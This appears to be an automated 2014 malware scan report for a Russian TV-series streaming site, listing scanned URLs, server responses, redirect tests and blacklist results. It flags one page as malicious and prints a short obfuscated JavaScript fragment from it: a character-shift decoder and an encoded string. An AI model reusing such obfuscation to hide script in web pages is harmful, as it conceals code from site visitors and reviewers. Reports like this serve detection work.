Scanned pages/files
Request | Server response | Status |
http://radoncompany.ru/ | 200 OK Content-Length: 100485 Content-Type: text/html | clean |
http://rtrgt2.com/apu.php?zoneid=1708 | 200 OK Content-Length: 747 Content-Type: application/x-javascript | clean |
http://s51.ucoz.net/src/jquery-1.6.1.js | 200 OK Content-Length: 101532 Content-Type: text/javascript | clean |
http://s51.ucoz.net/src/ulightbox/ulightbox.js | 200 OK Content-Length: 39848 Content-Type: text/javascript | clean |
http://s51.ucoz.net/src/uwnd.js?2 | 200 OK Content-Length: 228798 Content-Type: text/javascript | clean |
http://s51.ucoz.net/src/gstoolbar2/js/tool.js | 200 OK Content-Length: 35970 Content-Type: text/javascript | clean |
http://radoncompany.ru/designs_131/script_site.js | 200 OK Content-Length: 9589 Content-Type: application/javascript | clean |
http://radoncompany.ru/designs_131/highslide.js | 200 OK Content-Length: 51925 Content-Type: application/javascript | clean |
http://radoncompany.ru/load/ | 404 Not Found Content-Length: 1 Content-Type: text/html | clean |
http://radoncompany.ru/test404page.js | 404 Not Found Content-Length: 1 Content-Type: text/html | clean |
http://radoncompany.ru/gb/ | 200 OK Content-Length: 73002 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _y8M=''; function _dS(s){ var i;var r=""; var l=s.length-1; var k=s.substr(l,1); for (i=0;i<l;i++){ c=s.charCodeAt(i)-k; if(c<32){ c=127-(32-c);} r+=String.fromCharCode(c); } return r;} _y8M=_dS('Ansuzy%y~ujB\'mniijs\'%sfrjB\'xtx\'%{fqzjB\'788;><65<9\'%4C5'); Antivirus reports:
| ||
http://s7.ucoz.net/src/bbcodes.js | 200 OK Content-Length: 9800 Content-Type: text/javascript | clean |
http://radoncompany.ru/load/tureckie_serialy/ljubov_i_nenavist_aska_surgun_2005_tureckij_serial_na_russkom_jazyke/34-1-0-843 | 200 OK Content-Length: 82212 Content-Type: text/html | clean |
http://radoncompany.ru//vk.com/js/api/openapi.js?105/ | 404 Not Found Content-Length: 1 Content-Type: text/html | clean |
http://radoncompany.ru/load/tureckie_serialy/gospozha_dila_2012_tureckij_serial_vse_serij_na_russkom_jazyke/34-1-0-839 | 200 OK Content-Length: 82266 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: radoncompany.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Connection: close
Date: Thu, 10 Apr 2014 01:12:05 GMT
Pragma: no-cache
Server: Apache
Content-Length: 100485
Content-Type: text/html;charset=utf-8
Expires: Sun, 13 Apr 2014 00:00:00 GMT
Last-Modified: Thu, 10 Apr 2014 00:00:00 GMT
X-Powered-By: PHP/5.4.23
...100485 bytes of data.
GET / HTTP/1.1
Host: radoncompany.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Connection: close
Date: Thu, 10 Apr 2014 01:12:05 GMT
Pragma: no-cache
Server: Apache
Content-Length: 100485
Content-Type: text/html;charset=utf-8
Expires: Sun, 13 Apr 2014 00:00:00 GMT
Last-Modified: Thu, 10 Apr 2014 00:00:00 GMT
X-Powered-By: PHP/5.4.23
...100485 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: radoncompany.ru
Referer: http://www.google.com/search?q=radoncompany.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: radoncompany.ru
Referer: http://www.google.com/search?q=radoncompany.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=radoncompany.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://radoncompany.ru/
Result: radoncompany.ru is not infected or malware details are not published yet.
Result: radoncompany.ru is not infected or malware details are not published yet.